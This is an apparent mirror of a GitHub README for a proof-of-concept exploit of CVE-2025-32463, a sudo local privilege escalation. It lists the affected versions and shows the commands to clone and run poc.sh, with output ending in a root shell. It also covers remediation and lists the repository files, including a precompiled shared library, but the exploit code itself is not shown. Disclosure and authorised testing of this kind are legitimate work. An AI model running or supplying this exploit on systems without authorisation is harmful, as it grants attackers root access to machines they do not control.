来源

关联漏洞

描述

# CVE-2025-32463 – Sudo EoP Exploit (PoC) with precompiled .so

介绍

# CVE-2025-32463 – Sudo EoP Exploit (PoC) with precompiled library

This repository contains a proof-of-concept (PoC) exploit for **CVE-2025-32463**, a local privilege escalation vulnerability in `sudo` discovered by Rich Mirch.

## Credit
https://github.com/kh4sh3i/CVE-2025-32463

## ⚠️ Disclaimer

This PoC is for **educational and authorized testing purposes only**. Do not use this code on systems you do not own or have explicit permission to assess.

---

## 🔧 Requirements

- sudo with chroot support (-R): version 1.9.14 to 1.9.17
- [nsswitch](https://en.wikipedia.org/wiki/Name_Service_Switch) enabled

## 🚀 How to run the POC

    git clone https://github.com/zinzloun/CVE-2025-32463.git
    cd CVE-2025-32463
Check if the current user has low privileges

    :~/CVE-2025-32463$ id
    uid=1001(poc) gid=1001(poc) groups=1001(poc),100(users)
Check requirements

    :~/CVE-2025-32463$ sudo --version
    Sudo version 1.9.15p5
    ...
    :~/CVE-2025-32463$ ls -al /etc/nsswitch.conf
    -rw-r--r-- 1 root root 526 Feb 16 20:57 /etc/nsswitch.conf
Run the exploit
        
    :~/CVE-2025-32463$ chmod +x poc.sh && ./poc.sh
    woot!
    root@ubutes01:/# id
    uid=0(root) gid=0(root) groups=0(root),100(users),1001(poc)

## 🚒 Remediation on Ubuntu 24.04 LTS
- For connected systems just run

      sudo apt update && sudo apt upgrade
- For air gapped systems: you can obtain the last sudo package from here: https://github.com/sudo-project/sudo/releases/download/v1.9.17p1/sudo_1.9.17-2_ubu2404_amd64.deb. Once the package has been transfered to the target system, just run:

       sudo dpkg -i sudo_1.9.17-2_ubu2404_amd64.deb

文件快照

 [4.0K]  /data/pocs/3b74b1e6bbd6bcbfb9a83cade64fddd020d19158
├── [ 11K]  LICENSE
├── [ 517]  poc.sh
├── [1.6K]  README.md
└── [ 15K]  woot1337.so.2

0 directories, 4 files

备注